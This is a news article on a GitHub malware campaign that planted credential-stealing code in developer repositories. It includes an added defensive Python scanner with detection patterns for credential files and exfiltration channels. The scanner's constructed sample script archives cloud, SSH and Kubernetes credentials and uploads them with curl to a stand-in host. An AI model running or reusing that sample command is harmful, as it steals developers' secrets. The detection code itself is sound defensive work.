Newscast

New GitHub malware campaign is quietly poisoning developer projects

By Nik

May 25, 2026

A dangerous new malware campaign called “Megalodon” is spreading across GitHub, and it’s targeting developers in a particularly sneaky way.

According to researchers at SafeDep, more than 5,500 repositories were found carrying malicious code designed to steal sensitive credentials from development environments and cloud infrastructure.

What makes the attack notable is how normal it looks. The attacker reportedly posed as an automated “build bot” and submitted seemingly harmless code contributions to open-source projects. If a maintainer merged the contribution, the malicious code became part of the repository and ran wherever the project was built, harvesting secrets from CI/CD runners and developer machines.

The stolen data reportedly includes cloud access tokens, SSH keys, Docker and Kubernetes configurations, Terraform credentials, and authentication secrets tied to services like AWS, Azure, and Google Cloud.
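As an added illustration, and not SafeDep's detection logic or any artifact from the campaign itself, here is a small heuristic scanner a maintainer could run over a checkout before merging a contribution. It flags files that both reference the kinds of credential locations listed above and open an outbound channel, which is the shape a harvester has to take. The file paths, regular expressions, and the sample scripts it scans are assumptions constructed for the example.

```python
"""Heuristic scan for credential-harvesting code in a repository checkout.

Added example (not SafeDep's or the campaign's code). Patterns and sample
inputs are assumptions chosen for illustration, not observed indicators.
"""
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Where a harvester would look for secrets (assumed; common default locations).
CREDENTIAL_PATTERNS = {
    "aws": r"\.aws/credentials|AWS_SECRET_ACCESS_KEY",
    "azure": r"\.azure/|AZURE_CLIENT_SECRET",
    "gcp": r"application_default_credentials\.json|GOOGLE_APPLICATION_CREDENTIALS",
    "ssh": r"\.ssh/id_[a-z0-9]+",
    "docker": r"\.docker/config\.json",
    "kubernetes": r"\.kube/config|KUBECONFIG",
    "terraform": r"credentials\.tfrc\.json|TF_TOKEN_",
    "ci": r"GITHUB_TOKEN|ACTIONS_RUNTIME_TOKEN|CI_JOB_TOKEN",
}

# Ways of moving data off the machine (assumed; deliberately not exhaustive).
EXFIL_PATTERNS = {
    "curl_post": r"\bcurl\b[^\n]*(-d|--data|-F|-T|--upload-file)",
    "wget_post": r"\bwget\b[^\n]*--post-(data|file)",
    "python_http": r"requests\.(post|put)|urllib\.request\.urlopen|http\.client",
    "node_http": r"https?\.request\(|fetch\(|axios\.(post|put)",
    "raw_socket": r"socket\.(socket|create_connection)|net\.connect",
}

# File types worth scanning: shell, Python, JS/TS, workflow YAML, extensionless.
SCAN_SUFFIXES = {".sh", ".bash", ".py", ".js", ".mjs", ".cjs", ".ts", ".yml", ".yaml", ""}


def classify_text(text: str) -> Dict[str, List[str]]:
    """Return which credential sources and exfil channels the text references."""
    creds = [name for name, rx in CREDENTIAL_PATTERNS.items() if re.search(rx, text)]
    exfil = [name for name, rx in EXFIL_PATTERNS.items() if re.search(rx, text)]
    return {"credentials": creds, "exfil": exfil}


def risk_level(findings: Dict[str, List[str]]) -> str:
    """'high' = reads secrets AND sends data out (harvester shape, review it);
    'low' = only one of the two (common in legitimate deploy code); 'none'."""
    has_creds, has_exfil = bool(findings["credentials"]), bool(findings["exfil"])
    if has_creds and has_exfil:
        return "high"
    if has_creds or has_exfil:
        return "low"
    return "none"


def scan_tree(root: Path) -> Dict[str, str]:
    """Map each scanned file (path relative to root) to its risk level."""
    results: Dict[str, str] = {}
    for path in root.rglob("*"):
        if not path.is_file() or ".git" in path.parts or path.suffix not in SCAN_SUFFIXES:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        results[str(path.relative_to(root))] = risk_level(classify_text(text))
    return results


# Constructed sample inputs (not real campaign artifacts).
SAMPLE_BENIGN = "#!/bin/sh\nset -e\nnpm ci\nnpm test\n"
SAMPLE_DEPLOY = "#!/bin/sh\nexport KUBECONFIG=$HOME/.kube/config\nkubectl apply -f deploy.yaml\n"
SAMPLE_SUSPICIOUS = (
    "#!/bin/sh\n"
    "# looks like a routine 'build bot' post-install step\n"
    "tar czf /tmp/b.tgz ~/.aws/credentials ~/.ssh/id_ed25519 ~/.kube/config "
    "~/.docker/config.json ~/.terraform.d/credentials.tfrc.json 2>/dev/null\n"
    "curl -s -F 'f=@/tmp/b.tgz' https://example.invalid/upload\n"
)


def demo() -> Dict[str, str]:
    """Write the constructed samples into a temporary checkout and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "ci").mkdir()
        (root / "ci" / "test.sh").write_text(SAMPLE_BENIGN)
        (root / "ci" / "deploy.sh").write_text(SAMPLE_DEPLOY)
        (root / "ci" / "postinstall.sh").write_text(SAMPLE_SUSPICIOUS)
        return scan_tree(root)


if __name__ == "__main__":
    for rel_path, level in sorted(demo().items()):
        print(f"{level:5} {rel_path}")
```

The scanner surfaces candidates for a human to read, not a verdict: a legitimate deploy script that reads a kubeconfig and also posts to a webhook will score "high", and a harvester that obfuscates its strings or shells out to a tool not in the exfil list will slip through. It is cheap to run as a pre-merge check, and its real value is forcing a maintainer to look at exactly the lines that touch secrets in a contribution from an unfamiliar account.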

The real danger comes from how software supply chains work. Once an infected repository is published to package platforms or reused in other projects, the malware can spread far beyond the original target. Researchers say this already happened in at least one case involving the Tiledesk project, where compromised code was unknowingly published to npm by legitimate maintainers.

Unlike traditional malware aimed at average users, campaigns like Megalodon focus on developers because compromising one trusted project can indirectly infect thousands of downstream systems.

Researchers also believe this may be the beginning of a wider trend. A separate threat group known as TeamPCP recently gained attention for targeting open-source ecosystems, and Megalodon appears inspired by similar tactics, even if it comes from a different actor.